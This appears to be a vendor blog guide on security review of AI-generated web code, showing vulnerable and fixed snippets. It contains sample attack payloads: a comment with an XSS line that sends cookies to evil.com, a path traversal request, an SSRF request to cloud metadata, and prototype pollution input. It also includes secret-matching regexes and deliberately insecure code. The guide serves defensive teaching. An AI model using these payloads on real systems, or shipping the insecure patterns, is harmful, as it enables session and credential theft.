DevBolt
By The DevBolt Team · 14 min read

Vibe Coding Security: How to Review AI-Generated Code for Vulnerabilities

Security · AI · How-To · Code Review

"Vibe coding" — using AI to generate entire features from natural language prompts — is how millions of developers ship code in 2026. But Veracode's 2025 State of Software Security report found that 45% of AI-generated code contains at least one vulnerability. Copilot, Cursor, Claude, and ChatGPT all produce code that compiles, passes tests, and ships with SQL injection, hardcoded secrets, or missing auth checks baked in. This guide walks through a practical, step-by-step security review process for any AI-generated code before it reaches production.

Want to scan code automatically? Paste your AI-generated code into DevBolt's AI Code Security Scanner for instant vulnerability detection — 25 rules across 10 categories, with CWE references and fix guidance. 100% client-side.

Why AI-Generated Code Is a Security Risk

AI models learn from millions of open-source repositories — including code with known vulnerabilities, outdated patterns, and insecure defaults. They optimize for "code that works," not "code that is secure." Common problems include:

  1. Hardcoded secrets — AI often generates placeholder API keys, database passwords, and JWT secrets directly in the code instead of reading from environment variables.
  2. Missing input validation — generated endpoints frequently accept and process user input without sanitization, creating injection vectors.
  3. Insecure defaults — CORS set to *, Math.random() for tokens, eval() for parsing, JWT without verification, HTTP instead of HTTPS.
  4. Overly complex logic — AI tends to produce deeply nested, high-complexity functions that are harder to review and more likely to hide bugs.
  5. Outdated patterns — models trained on older code may use deprecated APIs, weak cryptographic algorithms (MD5, SHA-1), or patterns that were acceptable years ago but are exploitable today.

Step 1: Scan for Known Vulnerability Patterns

Before reading the code manually, run it through an automated scanner. This catches the low-hanging fruit — hardcoded secrets, dangerous functions, and common anti-patterns — in seconds.

Use DevBolt's AI Code Security Scanner to paste your code and get an instant report. Here is what a typical AI-generated API handler looks like when scanned:

Vulnerable AI-generated code
// AI-generated Express endpoint
app.post("/api/users", async (req, res) => {
  const { email, password, role } = req.body;

  // Hardcoded secret (CWE-798)
  const API_KEY = "sk-proj-abc123def456";

  // SQL injection (CWE-89)
  const user = await db.query(
    `SELECT * FROM users WHERE email = '${email}'`
  );

  // Weak hashing (CWE-328)
  const hash = crypto.createHash("md5").update(password).digest("hex");

  // Missing auth check — anyone can set role to "admin"
  await db.query(
    `INSERT INTO users (email, password, role) VALUES ('${email}', '${hash}', '${role}')`
  );

  // Insecure token generation (CWE-330)
  const token = Math.random().toString(36).slice(2);

  res.json({ token });
});

A scanner would flag at least 5 issues here: the hardcoded API key, two SQL injection points, MD5 hashing for passwords, and Math.random() for token generation. Every one of these is a real vulnerability that AI assistants routinely produce.

Step 2: Check for Hardcoded Secrets and Credentials

This is the single most common vulnerability in AI-generated code. AI models frequently generate placeholder credentials that look real and get committed to repositories. Search for these patterns:

Patterns to search for
# API keys and tokens
/sk-[a-zA-Z0-9]{20,}/     # OpenAI-style keys
/AKIA[0-9A-Z]{16}/         # AWS access keys
/ghp_[a-zA-Z0-9]{36}/      # GitHub personal access tokens
/secret.*=.*["'][^"']+/i    # Generic secret assignments

# Database credentials
/mongodb(\+srv)?:\/\/\w+:\w+@/   # MongoDB connection strings
/postgres:\/\/\w+:\w+@/          # PostgreSQL connection strings
/password\s*[:=]\s*["'][^"']+/   # Password assignments
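These patterns can be wired into a quick pre-commit check. A minimal sketch in Node — the pattern list here is illustrative and deliberately narrower than a real secrets scanner:

```javascript
// Run a small set of secret-detection regexes over a source string.
// Patterns are illustrative examples, not an exhaustive rule set.
const SECRET_PATTERNS = [
  { name: "OpenAI-style key", re: /sk-[a-zA-Z0-9]{20,}/ },
  { name: "AWS access key", re: /AKIA[0-9A-Z]{16}/ },
  { name: "GitHub token", re: /ghp_[a-zA-Z0-9]{36}/ },
  { name: "Generic secret", re: /secret\s*[:=]\s*["'][^"']+["']/i },
  { name: "Password assignment", re: /password\s*[:=]\s*["'][^"']+["']/i },
];

// Returns the names of all patterns that match the source text.
function findSecrets(source) {
  return SECRET_PATTERNS
    .filter(({ re }) => re.test(source))
    .map(({ name }) => name);
}
```

Run it over each staged file before committing; any non-empty result means a credential needs to move into an environment variable.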

The fix: Replace every hardcoded credential with an environment variable. Use DevBolt's .env Validator to verify your .env file has no exposed secrets and matches your .env.example.

Before (insecure)
const JWT_SECRET = "super-secret-key-123";
const DB_URL = "postgres://admin:password@localhost/mydb";
After (secure)
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) throw new Error("JWT_SECRET not configured");

const DB_URL = process.env.DATABASE_URL;
if (!DB_URL) throw new Error("DATABASE_URL not configured");

Step 3: Validate All User Inputs

AI-generated code frequently trusts user input implicitly. Every value that comes from a request body, query parameter, URL path, or header must be validated before use. Look for:

  • Direct string interpolation in SQL queries (`${req.body.id}`)
  • eval() or new Function() with user input
  • innerHTML or dangerouslySetInnerHTML with unsanitized data
  • File paths constructed from user input (fs.readFile(req.params.file))
  • URLs built from user input passed to fetch() (SSRF)
Before (SQL injection)
// AI-generated — vulnerable to SQL injection
app.get("/api/users/:id", async (req, res) => {
  const user = await db.query(
    `SELECT * FROM users WHERE id = '${req.params.id}'`
  );
  res.json(user.rows[0]);
});
After (parameterized query)
// Secure — parameterized query prevents injection
app.get("/api/users/:id", async (req, res) => {
  const id = parseInt(req.params.id, 10);
  if (isNaN(id)) return res.status(400).json({ error: "Invalid ID" });

  const user = await db.query(
    "SELECT * FROM users WHERE id = $1",
    [id]
  );
  res.json(user.rows[0]);
});

Step 4: Review Authentication and Authorization

AI-generated auth code is notoriously fragile. Common issues include:

  • JWT without verification: code that decodes tokens using jwt.decode() instead of jwt.verify(), meaning anyone can forge tokens
  • Algorithm confusion: accepting alg: "none" or mixing HMAC/RSA algorithms, allowing signature bypass
  • Missing role checks: endpoints that authenticate the user but never verify they have permission for the specific action
  • Insecure cookies: session cookies missing httpOnly, secure, or sameSite attributes
Before (JWT decode without verify)
// AI-generated — decodes JWT without verifying signature!
const payload = jwt.decode(token);
if (payload.userId) {
  // Trusts unverified data — anyone can craft a fake token
  const user = await getUser(payload.userId);
}
After (proper JWT verification)
// Secure — verifies signature with explicit algorithm
try {
  const payload = jwt.verify(token, process.env.JWT_SECRET, {
    algorithms: ["HS256"],  // Explicit algorithm prevents confusion attacks
    maxAge: "1h",
  });
  const user = await getUser(payload.userId);
} catch (err) {
  return res.status(401).json({ error: "Invalid token" });
}
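The insecure-cookies item is also a quick fix. As an illustrative sketch, here is a helper that serializes a Set-Cookie header with the attributes AI-generated code tends to omit (in Express you would pass the same flags as options to res.cookie()):

```javascript
// Build a Set-Cookie header value with the security attributes
// from RFC 6265 that AI-generated session code frequently drops.
function secureSessionCookie(name, value, maxAgeSeconds) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    `Max-Age=${maxAgeSeconds}`,
    "Path=/",
    "HttpOnly",        // not readable from document.cookie (blunts XSS token theft)
    "Secure",          // only sent over HTTPS
    "SameSite=Strict", // not sent on cross-site requests (CSRF defense)
  ].join("; ");
}
```

If a generated handler sets a session cookie without all three of HttpOnly, Secure, and SameSite, treat it as a finding.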

Use DevBolt's JWT Decoder to inspect token headers and payloads, and the JWT Builder to test signing with different algorithms.

Step 5: Check for Cross-Site Scripting (XSS)

AI-generated frontend code regularly uses innerHTML or dangerouslySetInnerHTML to render dynamic content. This creates XSS vulnerabilities where attackers can inject scripts:

Before (XSS via innerHTML)
// AI-generated React component — XSS vulnerability
function UserComment({ comment }) {
  return (
    <div dangerouslySetInnerHTML={{ __html: comment.body }} />
  );
}

// If comment.body contains: <img src=x onerror="document.location='https://evil.com?c='+document.cookie">
// The attacker steals the user's session cookie
After (safe rendering)
// Secure — render text content, not HTML
function UserComment({ comment }) {
  return <div>{comment.body}</div>;
}

// If you MUST render HTML, sanitize it first:
import DOMPurify from "dompurify";

function UserComment({ comment }) {
  const clean = DOMPurify.sanitize(comment.body);
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}

Step 6: Audit Dependencies and Imports

AI models sometimes suggest packages that are deprecated, unmaintained, or have known vulnerabilities. When AI generates an npm install or import statement, verify:

  • The package exists and is actively maintained (check npm weekly downloads and last publish date)
  • Run npm audit after installing to check for known vulnerabilities
  • The package name is correct — AI sometimes hallucinates package names that don't exist, and typosquatters register malicious packages with similar names
  • Consider whether you need the dependency at all — AI tends to import heavy libraries for tasks achievable with built-in APIs
Common AI dependency mistakes
# AI suggests deprecated crypto library
npm install crypto  # ❌ Use built-in Node.js crypto module

# AI suggests request (deprecated since 2020)
npm install request  # ❌ Use fetch() (built into Node 18+)

# AI hallucinates a package name
npm install express-validator-plus  # ❌ Package doesn't exist
npm install express-validator       # ✓ The real package
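Part of this check is automatable. A minimal sketch that screens a package.json object against a deny-list — both the list and its entries are illustrative, not a maintained database:

```javascript
// Illustrative deny-list of packages that are deprecated or shadow
// Node built-ins. A real audit would pull from npm advisories instead.
const KNOWN_BAD = {
  crypto: "shadowed by the built-in node:crypto module",
  request: "deprecated since 2020; use fetch()",
};

// Returns a human-readable issue for each flagged dependency.
function auditDeps(pkg) {
  return Object.keys(pkg.dependencies || {})
    .filter((name) => name in KNOWN_BAD)
    .map((name) => `${name}: ${KNOWN_BAD[name]}`);
}
```

Pair this with npm audit: the deny-list catches deprecated-but-not-vulnerable packages that audit tooling may not flag.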

Step 7: Test Error Handling for Information Leakage

AI-generated error handling frequently leaks internal details — stack traces, database schemas, file paths, and environment information — that help attackers map your application.

Before (information leakage)
app.use((err, req, res, next) => {
  // AI-generated error handler leaks everything
  console.log("Error:", err);
  res.status(500).json({
    error: err.message,
    stack: err.stack,         // Leaks internal file paths
    query: err.sql,           // Leaks database query
    config: app.get("config") // Leaks server configuration
  });
});
After (safe error handling)
app.use((err, req, res, next) => {
  // Log full error internally for debugging
  console.error("Internal error:", err);

  // Return generic message to client
  res.status(500).json({
    error: "An internal error occurred",
    requestId: req.id,  // Correlate with server logs
  });
});

Step 8: Measure Code Complexity

AI-generated code often has high cyclomatic and cognitive complexity — deeply nested conditionals, long functions, and convoluted logic. High complexity is a leading indicator of bugs, including security bugs. Functions with cyclomatic complexity above 10 are statistically more likely to contain defects.

Paste your AI-generated code into DevBolt's Code Complexity Analyzer to get per-function metrics. Focus on functions flagged as "High" or "Very High" risk — these are the ones most likely to hide bugs and should be refactored before shipping.

Target these thresholds per function:

  • Cyclomatic complexity: keep under 10. Above 20 means refactor immediately.
  • Cognitive complexity: keep under 15. Above 25 means the function is too hard to review reliably.
  • Nesting depth: keep under 4 levels. Use guard clauses and early returns to flatten.
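The guard-clause advice is easiest to see side by side. An illustrative sketch — the same hypothetical permission check written with four levels of nesting (typical AI output), then flattened with early returns:

```javascript
// Nested version: depth 4, harder to review.
function canEditNested(user, doc) {
  if (user) {
    if (doc) {
      if (!doc.locked) {
        if (user.id === doc.ownerId || user.role === "admin") {
          return true;
        }
      }
    }
  }
  return false;
}

// Flattened version: guard clauses exit early, depth 1,
// and every rejection path is visible at a glance.
function canEditFlat(user, doc) {
  if (!user || !doc) return false;
  if (doc.locked) return false;
  return user.id === doc.ownerId || user.role === "admin";
}
```

Both functions behave identically; the flat one is the version a reviewer can actually verify in seconds.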

The Vibe Coding Security Checklist

Run through this checklist every time you ship AI-generated code:

Check          | What to Look For                        | Tool
---------------|-----------------------------------------|---------------------
Secrets        | API keys, passwords, tokens in source   | Security Scanner
Injection      | SQL, NoSQL, command, LDAP injection     | Security Scanner
XSS            | innerHTML, dangerouslySetInnerHTML      | Security Scanner
Auth           | JWT verify, role checks, cookie flags   | JWT Decoder
Complexity     | CC > 10, nesting > 4, long functions    | Complexity Analyzer
Dependencies   | npm audit, deprecated packages          | npm CLI
Error handling | Stack traces, SQL queries in responses  | Manual review
Env config     | .env structure, missing vars            | .env Validator

How to Prompt AI for More Secure Code

You can significantly reduce the number of vulnerabilities in AI-generated code by being explicit about security requirements in your prompts. Instead of:

Vague prompt (produces insecure code)
"Write an Express endpoint to create a user"

Use a structured prompt with explicit security constraints:

Security-aware prompt
"Write an Express POST endpoint to create a user.
Requirements:
- Use parameterized queries (no string interpolation in SQL)
- Read secrets from environment variables only
- Validate all inputs with express-validator
- Hash passwords with bcrypt (cost factor 12+)
- Return generic error messages (no stack traces)
- Set httpOnly, secure, sameSite cookies
- Rate limit to 5 requests per minute per IP
- Use TypeScript with strict mode"

DevBolt's AI Prompt Template Builder has pre-built templates for code review and security-focused prompts that you can customize for your use case.

Real-World Vulnerabilities Found in AI Code

These are actual vulnerability patterns that security researchers have found in AI-generated code across popular assistants:

1. Prototype Pollution

AI-generated object merge — prototype pollution
// AI often generates recursive merge functions like this:
function deepMerge(target, source) {
  for (const key in source) {
    if (typeof source[key] === "object" && source[key] !== null) {
      target[key] = target[key] || {};
      deepMerge(target[key], source[key]);
    } else {
      target[key] = source[key];  // No __proto__ check!
    }
  }
  return target;
}

// Attacker sends: { "__proto__": { "isAdmin": true } }
// Now EVERY object in the app has isAdmin === true
Fixed version
function deepMerge(target, source) {
  for (const key of Object.keys(source)) {
    // Block prototype pollution
    if (key === "__proto__" || key === "constructor" || key === "prototype") {
      continue;
    }
    if (typeof source[key] === "object" && source[key] !== null) {
      target[key] = target[key] || {};
      deepMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

2. Path Traversal

AI-generated file server — path traversal
// AI-generated static file handler
app.get("/files/:name", (req, res) => {
  const filePath = path.join(__dirname, "uploads", req.params.name);
  res.sendFile(filePath);
});

// Attacker requests: GET /files/../../etc/passwd
// Server sends the system password file
Fixed version
app.get("/files/:name", (req, res) => {
  const safeName = path.basename(req.params.name); // Strip directory traversal
  const filePath = path.join(__dirname, "uploads", safeName);

  // Extra safety: verify the resolved path stays inside uploads/.
  // Comparing against the directory plus a trailing separator avoids
  // prefix-match bypasses (e.g. a sibling "uploads-evil" directory).
  const uploadsDir = path.join(__dirname, "uploads");
  if (!filePath.startsWith(uploadsDir + path.sep)) {
    return res.status(403).json({ error: "Access denied" });
  }

  res.sendFile(filePath);
});

3. SSRF (Server-Side Request Forgery)

AI-generated URL fetcher — SSRF vulnerability
// AI-generated webhook handler
app.post("/api/webhook", async (req, res) => {
  const { callbackUrl } = req.body;

  // Fetches ANY URL the user provides — including internal services!
  const response = await fetch(callbackUrl);
  const data = await response.json();

  res.json(data);
});

// Attacker sends: { "callbackUrl": "http://169.254.169.254/latest/meta-data/" }
// Server responds with AWS instance credentials
Fixed version
import { URL } from "url";

const ALLOWED_HOSTS = ["api.example.com", "hooks.slack.com"];

app.post("/api/webhook", async (req, res) => {
  const { callbackUrl } = req.body;

  try {
    const parsed = new URL(callbackUrl);

    // Block internal IPs and restrict to HTTPS
    if (parsed.protocol !== "https:") {
      return res.status(400).json({ error: "HTTPS required" });
    }
    if (!ALLOWED_HOSTS.includes(parsed.hostname)) {
      return res.status(400).json({ error: "Host not allowed" });
    }

    const response = await fetch(callbackUrl);
    const data = await response.json();
    res.json(data);
  } catch {
    res.status(400).json({ error: "Invalid URL" });
  }
});

Ship Fast, but Ship Safe

Vibe coding is not going away — it makes developers faster, and the tools keep improving. The solution is not to stop using AI for code generation, but to build a security review habit into your workflow. Scan every AI-generated function before committing. Check for secrets, injection, auth flaws, and complexity. Use structured prompts that include security requirements.

The entire review process takes 5 minutes per feature. Those 5 minutes are the difference between "AI wrote my code" and "my code is in production with a SQL injection vulnerability."

Deploying AI-generated code to production?

DigitalOcean App Platform auto-deploys from Git with built-in container security scanning, environment variable management, and DDoS protection — so your infrastructure is secure even if your code needs work. Start free, scale when ready.


Written by the DevBolt Team

DevBolt is a collection of 117+ free developer tools that run entirely in your browser — no data ever leaves your device. Built and maintained by AI agents, reviewed by humans. Learn more about DevBolt